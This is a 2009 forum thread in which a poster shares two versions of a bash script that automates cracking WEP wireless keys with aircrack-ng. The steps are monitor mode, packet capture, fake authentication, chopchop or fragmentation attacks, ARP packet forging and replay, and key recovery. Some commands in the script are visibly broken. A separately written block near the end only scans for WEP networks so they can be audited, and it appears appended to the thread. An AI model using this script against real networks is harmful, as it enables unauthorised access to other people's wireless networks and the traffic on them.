WiFi WEP cracking (aircrack-ng)

 PostPosted: Thu Aug 20, 2009 10:56 am   

Joined: Sat Aug 15, 2009 11:07 am
Posts: 6
Location: South Africa
I have a hobby that's breaking wifi networks (with permission, of course!), so I made this script to get a little practice in scripting.
So far I have dumped all the necessary commands for the WEP cracking process. Needs a little cleaning up!
It also assumes you're in the directory into which you want to dump all the files. Maybe I could add an 'rm' as a clean-up?

This is only my third script so some stuff I have not got around to learning.
I would like some help in finding a way to run some of the commands in new terminals or shells. This has to be done.
Also, I need to make the 'for' loop (highlighted by "###") run each of the variable assignment commands for each of the searched networks found. I'll get there, but maybe someone has a good way?

Any other help would be appreciated! =D>

I apologize for the mess! :))

--- EDIT --- 22.08.09
--------------------
Updated the script into something a little more workable. Still in progress, as I haven't tested it fully yet, only segments.
The netlist_auto method is VERY inefficient and needs more work.
Still need advice for running processes in external shells (ideally in a split Terminator terminal! :) )
--------------------


Code:
#!/bin/bash
#
# --------------------
# Script to create an easy WEP cracking process
# --------------------
# Created by Adam 19.08.09
# --------------------
#
# --------------------
# VARIABLES
# --------------------
#
wifi_device=              # prompted at start of script
source_address=      # auto collected after obtaining $wifi_device
source_device=      # prompted after enabling monitor mode
target_address=      # prompted after choosing target network
target_channel=      # prompted after choosing target network      
target_essid=              # prompted after choosing target network
networks_count=      # auto collected when running a network scan
i=1                         # counter in displaying broadcasting networks
choice=                 # prompted at CHOPCHOP|FRAGMENT
capture_files=              # prompted when capturing packets
packetforge_packet=   # prompted when building the packet to replay
cleanup_answer=      # prompted at clean_up Y|N
net_choice=               # prompted at network choice
# --------------------
# FUNCTIONS
# --------------------
function clean_up() {
   echo "Script terminated. Cleaning created files"
   # TODO: remove all created files
   exit 0
   }

function  netlist_manual() {
   # print iwlist in LESS, then enter the target
   echo "Choose the WEP target (ADDRESS, CHANNEL and ESSID)"
   echo -n "(Enter to continue...)"
   read
   # print the network list in LESS reader
   iwlist $wifi_device scanning | less
   echo -n "Enter the ADDRESS > "
   read target_address
   echo -n "Enter the ESSID > "
   read target_essid
   echo -n "Enter the CHANNEL > "
   read target_channel
   }
   
function netlist_auto() {
   ##################################################
   # The following commands extract the variables needed from the iwlist command
   # Still need to
   #   1) and from there choose the desired WEP network
   # the following should then gather the data needed
   ##################################################
   networks_count=`iwlist wlan0 scanning | grep -E -o -c "Cell [0-9]+[0-9]"`
   clear
   echo "$networks_count networks found"
   echo ""
   for each in $(seq $networks_count)
      do
         # Need to reduce the number of iwlist calls (6x per network found) -  maybe store in a text file
         target_address=$(iwlist $wifi_device scan | grep -E "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | awk '/Address/ {print $5}')
         target_channel=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2)
         target_essid=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2)
         target_encrypt=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '7p' | cut -d ":" -f2)
         #cat ~/iwlist_script_networks | grep -E "`cat ~/test | sed -n "${i}p"`" | awk '/Address/ {print $5}'
         #cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2
         #cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2
         echo "Network #$i"
         echo "--------------------"
         echo "Address: $target_address"      # need to fix the assignment of variables here
         echo "ESSID: $target_essid"      #
         echo "Channel: $target_channel"      #
         echo ""
         i=`expr $i + 1`
   done
   ###############################################
   }   
# --------------------
# MAIN
# --------------------
#
trap clean_up SIGHUP SIGTERM  SIGINT
#mkdir ~/temp_caps/


# enter my wifi device
clear
echo "This is a script to crack a WEP encrypted network with very little input"
echo "--------------------"
echo -n "Enter your WIFI device > "
read wifi_device
# obtain my MAC address
source_address=`ifconfig $wifi_device | awk /'HWaddr/ {print $5}'`
echo "MAC Address being used: $source_address"
sleep 2
while [ "$net_choice" = "" ]; do
   echo "Choose method for displaying networks:"
   echo "   1) manual input method"
   echo "   2) auto-choice method (broken)"
   echo ""
   echo -n "Enter your choice > "
   read net_choice
      case $net_choice in
         1 )    #
            netlist_manual         
            ;;
         2 )    #
            netlist_auto
            ;;
         * )    echo "Not a valid choice!"
            sleep 2
            net_choice=
            clear
            ;;
      esac
   done

# start the wifi device in MONITOR MODE and obtain the NEW DEVICE
sudo airmon-ng start $wifi_device $target_channel
echo -n "Enter the new monitor-enabled interface > "; read source_device

# capture the packets and IV's using AIRODUMP-NG
# -------------------- need to do this in another window
echo "Starting airodump-ng to capture the packets needed..."
echo -n "Specify the name of the capture file > "; read capture_files
sudo airodump-ng -c $target_channel --bssid $target_address --write $capture_files $source_device

# use AIREPLAY-NG for FAKE AUTHENTICATION
# will continue to send keep-alive requests, in case the target refreshes (DHCP)
# -------------------- need to do this in another window
echo "Fake authenticating with target using aireplay-ng..."
sudo aireplay-ng --fakeauth 1 -q 5 -e $target_essid -a $target_address -h $source_address $source_device ## -q -- keep alive requests
################################

# choose between the CHOP-CHOP or FRAGMENT method for building packets
# -------------------- need to be in another window
while [ "$choice" = "" ]; do
   echo "need to build an ARP packet. Please choose either the 'chopchop' or 'fragment' method... "
   echo -n "Enter your choice > "
   read choice
      case $choice in
         chopchop )    # brute force an ARP packet from CHOP-CHOP
               echo "please follow the instructions..."
               sudo aireplay-ng --chopchop -e $target_essid -a $target_address -h $source_address $source_device
            ;;
         fragment )    # send FRAGMENTED packet to target, returning necessary data
               echo "please follow the instructions..."
               sudo aireplay-ng --fragment -e $target_essid -a $target_address -h $source_address $source_device
            ;;
         * )       echo "Not a valid choice"
               echo ""
               choice=
            ;;
      esac
   done
################################
echo "Using packetforge-ng to create the new packet..."
echo -n "Enter the filename for the newly built packet > "
read packetforge_packet
sudo packetforge-ng -0 -y *.xor -a $target_address -h $source_address -k 255.255.255.255 -l 255.255.255.255 -w ${packetforge_packet}.cap

# using AIREPLAY-NG to generate IV's
echo "Using aireplay-ng to bombard target and generate IV's..."
sudo aireplay-ng --arpreplay-ng -e $target_essid -a $target_address -h $source_address -r ${packetforge_packet}.cap $source_device

# using AIRCRACK-NG to release the passkey
echo "Going to crack the passkey with aircrack-ng..."
sudo aircrack-ng -l $target_essid ~/${capture_files}.*

clear
echo "Key-file is in your home directory, filed under (router ESSID).(router MAC).*"

clear
while [ "$cleanup_answer" = "" ]; do
   echo -n "Would you like to remove all other files, packets and captures [y/n]? > "
   read cleanup_answer
      case $cleanup_answer in
         y)   #
            echo "Cleaning up..."
            clean_up
            ;;
         n)   #
            echo "leaving files alone... N chosen"
            ;;
         *)   #
            echo "Not a valid choice.."   
            sleep 2
            clear
            cleanup_answer=
            ;;
      esac
   done


 PostPosted: Sat Aug 29, 2009 2:42 am   

Joined: Sat Aug 15, 2009 11:07 am
Posts: 6
Location: South Africa
Here is the (almost) completed version. I have not had the chance to test it, so there may be a few glitches here and there.

It requires that aircrack-ng is installed, and I think that's about it.
The script creates a temporary directory for all the packet captures etc., and prompts you to clean up all the files in the end. I have not tried outputting the cracked key to a file yet (one of the last commands), but just remove that option if it doesn't work and comment out the 'clear' command, so you can at least see the key on the terminal.

Cut me a little slack if it's not efficient coding :P - this is only my second script!

Code:
#!/bin/bash
#
# --------------------
# Script to create an easy WEP cracking process
# --------------------
# CHANGES
#
#   ++ make temporary directory for files and captures & store outputs in them
#      --done 25.08.09
#      --needs testing
#   ++ remove files in clean_up function
#      --done 25.08.09
#      --needs testing
#   ++ fix check_for_errors function & add to necessary commands
#      --done 25.08.09
#       --needs testing
#   ++ run commands in different terminals
#      --done 25.08.09
#      --needs testing
#   ++ fix netlist_auto function (print to file and extract information)
#
# --------------------
# Created by Adam 19.08.09
# --------------------
#
# --------------------
# VARIABLES - do not set if not already!
# --------------------
#
directory=$(date "+%a.%d.%b.%y")
wifi_device=              # device name for wifi
source_address=      # my MAC address for all commands
source_device=      # device with enabled monitor-mode
target_address=      # choice for choosing target network
target_channel=      # choice for target network      
target_essid=              # choice for target network
networks_count=      # number of networks for AUTO network-gather loop
i=1                         # counter in displaying broadcasting networks
choice=                 # for choosing CHOPCHOP | FRAGMENT
cleanup_answer=      # clean_up function Y|N
net_choice=              # loop for MANUAL | AUTO available networks
pid_airodump=      # process ID of packet collecting with AIRODUMP-NG
pid_aireplay_fake=           # process ID of fake-authentication with AIREPLAY-NG
pid_aireplay_iv=           # process ID of generating IV's with AIREPLAY-NG
#
# --------------------
# FUNCTIONS
# --------------------
#
# Clean up all captured files and created directories.
# Kill all separate and background processes.
function clean_up() {
   while [ "$cleanup_answer" = "" ]; do
      clear
      echo "killing all background processes..."
      kill pid_airodump
      kill pid_aireplay_fake
      kill pid_aireplay_iv
      killall xterm
      echo -n "Would you like to remove all other files, packets and captures [y/n]? > "
      read cleanup_answer
      case $cleanup_answer in
         y)   # remove all created files
            echo "Cleaning up..."
            # if ~/captures/${directory} exists
               if [ -d ~/captures/${directory} ]
                  then
                     rm -rv ~/captures/${directory}
                     echo "All clean!"
                     exit 0
                  else
                     echo "Directory ~/captures/$directory does not exist"
                     echo "Cannot remove files...you'll have to find them"
                     exit 1
                  fi
            ;;
         n)   # leave all files alone
            echo "leaving files alone..."
            ;;
         *)   # cycle menu
            echo "Not a valid choice.."   
            sleep 2
            clear
            cleanup_answer=
            ;;
         esac
      done
   }
#
function  netlist_manual() {
   # print iwlist in LESS, then enter the target
   echo "Choose the WEP target (ADDRESS, CHANNEL and ESSID)"
   echo -n "(Enter to continue...)"
   read
   # print the network list in LESS reader
   iwlist $wifi_device scanning
   echo ""
   echo -n "Enter the ADDRESS > "
   read target_address
   echo -n "Enter the ESSID > "
   read target_essid
   echo -n "Enter the CHANNEL > "
   read target_channel
   }
#
function netlist_auto() {
   ##############################################
        # The following commands extract the variables needed from the iwlist command
   # VERY BUGGY
   # need to print to file then extract details from there
   ##############################################
   #networks_count=`iwlist wlan0 scanning | grep -E -o -c "Cell [0-9]+[0-9]"`
   #clear
   #echo "$networks_count networks found"
   #echo ""
   #for each in $(seq $networks_count)
   #   do
   #      # Need to reduce the number of iwlist calls (6x per network found) -  maybe store in a text file
   #      target_address=$(iwlist $wifi_device scan | grep -E "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | awk '/Address/ {print $5}')
   #      target_channel=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2)
   #      target_essid=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2)
   #      target_encrypt=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '7p' | cut -d ":" -f2)
   #      #cat ~/iwlist_script_networks | grep -E "`cat ~/test | sed -n "${i}p"`" | awk '/Address/ {print $5}'
   #      #cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2
   #      #cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2
   #      echo "Network #$i"
   #      echo "--------------------"
   #      echo "Address: $target_address"      # need to fix the assignment of variables here
   #      echo "ESSID: $target_essid"      #
   #      echo "Channel: $target_channel"      #
   #      echo ""
   #      i=`expr $i + 1`
   #done
   }   
#
function check_for_errors() {
   if [ $? -ne 0 ]
      then
         echo "There was a problem completing previous command."
         echo ""
         echo "Running cleanup..."
         sleep 1
         clean_up
      fi
   }
#
# --------------------
# MAIN
# --------------------
#
trap clean_up SIGHUP SIGTERM  SIGINT
#
#  check if temp dir exists
if [ -d ~/captures/${directory} ]
   then
      echo "Locating to temporary directory ~/captures/${directory}/ ..."
      cd ~/captures/${directory}
   else   
      echo "Creating & locating to temporary directory ~/captures/${directory}/ ..."
      mkdir -p ~/captures/${directory} && cd ~/captures/${directory}
      check_for_errors
   fi
#
# enter my wifi device
clear
echo "This is a script to crack a WEP encrypted network with very little input"
echo "--------------------"
echo ""
echo -n "Enter your WIFI device > "
read wifi_device
#
# obtain my MAC address
source_address=`ifconfig $wifi_device | awk /'HWaddr/ {print $5}'`
echo "MAC Address being used: ${source_address}"
echo -n "(Enter to continue...)"
read
#
# method for obtaining network details
while [ "$net_choice" = "" ]; do
   clear
   echo "Choose method for displaying networks:"
   echo ""
   echo "   1) manual input method"
   echo "   2) auto-choice method (broken)"
   echo ""
   echo -n "Enter your choice > "
   read net_choice
      case $net_choice in
         1 )    # execute less reader and manual input
            netlist_manual         
            ;;
         2 )    # print to file and extract details
            netlist_auto
            ;;
         * )    echo "Not a valid choice!"
            sleep 2
            net_choice=
            clear
            ;;
      esac
   done
#
# start the wifi device in MONITOR MODE and obtain the NEW DEVICE
sudo airmon-ng start $wifi_device $target_channel
check_for_errors
echo -n "Enter the new monitor-enabled interface > "; read source_device
#
# capture the packets and IV's using AIRODUMP-NG
echo "Starting airodump-ng to capture the packets needed..."
xterm -e sudo airodump-ng -c $target_channel --bssid $target_address -w captures $source_device
pid_airodump=$!
#
# use AIREPLAY-NG for FAKE AUTHENTICATION
echo "Fake authenticating with target using aireplay-ng..."
xterm -e sudo aireplay-ng --fakeauth 1 -q 5 -e $target_essid -a $target_address -h $source_address $source_device # -q -- keep alive requests
pid_aireplay_fake=$!
#
# choose between the CHOP-CHOP or FRAGMENT method for building packets
while [ "$choice" = "" ]; do
   echo "need to build an ARP packet. Please choose either the 'chopchop' or 'fragment' method... "
   echo -n "Enter your choice > "
   read choice
      case $choice in
         chopchop )    # brute force an ARP packet from CHOP-CHOP
               echo "please follow the instructions..."
               sudo aireplay-ng --chopchop -e $target_essid -a $target_address -h $source_address $source_device
            ;;
         fragment )    # send FRAGMENTED packet to target, returning necessary data
               echo "please follow the instructions..."
               sudo aireplay-ng --fragment -e $target_essid -a $target_address -h $source_address $source_device
            ;;
         * )       echo "Not a valid choice"
               echo ""
               choice=
            ;;
         esac
   done
#
# using PACKETFORGE-NG to build new packet to replay
echo "Using packetforge-ng to create the new packet..."
sudo packetforge-ng -0 -y *.xor -a $target_address -h $source_address -k 255.255.255.255 -l 255.255.255.255 -w packet.cap
check_for_errors
#
# using AIREPLAY-NG to generate IV's
echo "Using aireplay-ng to bombard target and generate IV's..."
xterm -e sudo aireplay-ng --arpreplay-ng -e $target_essid -a $target_address -h $source_address -r packet.cap $source_device
pid_aireplay_iv=$!
#
# using AIRCRACK-NG to release the passkey
echo "Going to crack the passkey with aircrack-ng..."
sudo aircrack-ng -l ~/${target_essid}.key *.cap
#
#
clear
echo "Key-file is in your home directory, filed under (router ESSID).(router MAC).*"

clear
clean_up


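Both posts leave netlist_auto unfinished: calling iwlist several times per cell and picking fixed line offsets with sed breaks as soon as one cell prints a different number of lines. The block below is an added example, not the poster's script, written from an audit angle: it parses iwlist scanning output once with awk into one record per cell and flags the networks still on WEP so they can be migrated. SAMPLE_SCAN is constructed text, not a real scan; the function names are my own.

```shell
#!/bin/sh
# Constructed sample of `iwlist <dev> scanning` output; not a real scan.
SAMPLE_SCAN='wlan0     Scan completed :
          Cell 01 - Address: 00:11:22:33:44:55
                    ESSID:"LabNet-WEP"
                    Mode:Master
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=70/70  Signal level=-30 dBm
                    Encryption key:on
          Cell 02 - Address: 66:77:88:99:AA:BB
                    ESSID:"Office"
                    Channel:11
                    Encryption key:on
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
          Cell 03 - Address: CC:DD:EE:FF:00:11
                    ESSID:"Guest"
                    Channel:1
                    Encryption key:off'

# parse_scan: read iwlist text on stdin and emit one TSV record per cell:
#   address<TAB>essid<TAB>channel<TAB>security   (security: OPEN|WEP|WPA|WPA2)
# A cell with "Encryption key:on" but no WPA/WPA2 IE can only be WEP.
parse_scan() {
  awk '
    function flush() {
      if (addr != "") {
        sec = "OPEN"
        if (enc == "on") sec = wpa2 ? "WPA2" : (wpa ? "WPA" : "WEP")
        printf "%s\t%s\t%s\t%s\n", addr, essid, chan, sec
      }
      addr = essid = chan = enc = ""; wpa = wpa2 = 0
    }
    /Cell [0-9]+ - Address:/ { flush(); addr = $NF; next }
    /ESSID:"/        { sub(/^ *ESSID:"/, ""); sub(/"$/, ""); essid = $0; next }
    /^ *Channel:/    { split($0, f, ":"); chan = f[2]; next }  # skips the Frequency line
    /Encryption key:/ { split($0, f, ":"); enc = f[2]; next }
    /IE: .*WPA2/     { wpa2 = 1; next }
    /IE: .*WPA/      { wpa = 1; next }
    END { flush() }
  '
}

# security_of ADDRESS: security label of one cell in the sample scan.
security_of() {
  printf '%s\n' "$SAMPLE_SCAN" | parse_scan | awk -F'\t' -v a="$1" '$1 == a { print $4 }'
}

# list_wep_cells: address and ESSID of every cell still using WEP.
list_wep_cells() {
  printf '%s\n' "$SAMPLE_SCAN" | parse_scan | awk -F'\t' '$4 == "WEP" { print $1 "\t" $2 }'
}

list_wep_cells
```

To run it against a live interface, feed `iwlist "$wifi_device" scanning` into parse_scan instead of the constructed sample.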
© 2003 - 2011 USA LINUX USERS GROUP